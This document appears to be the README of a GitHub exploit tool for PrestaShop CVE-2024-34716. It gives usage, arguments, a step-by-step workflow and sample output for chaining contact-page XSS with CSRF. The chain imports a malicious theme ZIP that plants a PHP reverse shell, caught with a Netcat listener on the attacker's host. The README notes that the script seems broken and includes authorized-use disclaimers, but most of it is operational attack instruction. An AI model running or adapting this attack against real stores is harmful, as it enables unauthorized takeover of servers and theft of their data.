
0xDTC/Prestashop-CVE-2024-34716


Seems broken for now; will update later.

Exploit Script for CSRF and Reverse Shell Attack

This script automates a CSRF (Cross-Site Request Forgery) exploit that uploads a PHP reverse shell to a target's web server and executes it. The reverse shell is packaged as a ZIP file and delivered through a crafted CSRF payload, which fires when a privileged user interacts with the targeted endpoint. A listening Netcat instance is required to catch the reverse shell connection.

Requirements

  • Netcat: Ensure Netcat is installed and can listen on the chosen port (default: 9001).
  • Python 3: Used to run the temporary HTTP server that serves the ZIP file (port 8000).
  • curl and jq: Used to send HTTP requests and parse JSON responses.

Usage

./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>

Arguments

  • target_url: Base URL of the target (e.g., https://example.com).
  • admin_endpoint: Path to the admin theme import endpoint.
  • admin_email: Email address of an administrator (to spoof for the payload).
  • attacker_ip: IP address where the reverse shell listener will receive the connection.

Example

./exploit.sh https://victim.com /admin-panel admin@victim.com 192.168.1.10

Exploit Workflow

  1. Reverse Shell Creation: Generates a PHP reverse shell from revshells.com using the supplied attacker_ip and port 9001.
  2. ZIP Packaging: Compresses the reverse shell script (love.php) into Love-exploit.zip.
  3. CSRF Token Fetch: Retrieves the CSRF token from the target so that the theme-import request is accepted.
  4. HTML Payload Construction: Builds csrf_payload.html, which contains JavaScript that automatically submits the theme-import request for the reverse shell ZIP to the target's admin panel.
  5. HTTP Server Setup: Starts a temporary HTTP server on port 8000 that serves Love-exploit.zip for the target to download during the import.
  6. XSS Upload and CSRF Trigger: Uploads the CSRF payload through the target's contact page. When a logged-in administrator opens it, the embedded script fires the CSRF request.
  7. Reverse Shell Listener: The Netcat listener receives the connection back from the victim server.

Execution Steps

  1. Start a Netcat listener on your machine:

    nc -nvlp 9001
  2. Run the script:

    ./exploit.sh https://victim.com /admin-panel admin@victim.com 192.168.1.10
  3. Wait for the target to execute the CSRF payload and receive the reverse shell connection.

Output

The script outputs the following information during execution:

  • CSRF token retrieval status.
  • Status of reverse shell creation and packaging.
  • Status of payload delivery and HTTP server status.

Important Notes

  • Permissions: Run this script only against systems you are explicitly authorized to test. Unauthorized use is illegal and punishable by law.
  • Testing Environment: Use in a controlled, authorized environment only, such as a cybersecurity lab.
  • Port Conflicts: Ensure ports 8000 (HTTP server) and 9001 (Netcat listener) are free before running the script.
  • Reachability: The target server downloads Love-exploit.zip from attacker_ip:8000 during the import, and the reverse shell connects back to attacker_ip:9001, so both ports must be reachable from the target host, not only from the administrator's browser.

Example Output

[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...

This document is intended for use by penetration testers and cybersecurity researchers in controlled environments. Misuse of this tool for unauthorized purposes is strictly prohibited.


Disclaimer

This script is for educational purposes and legal cybersecurity assessments only. Unauthorized use against a system without permission is illegal and against ethical guidelines.
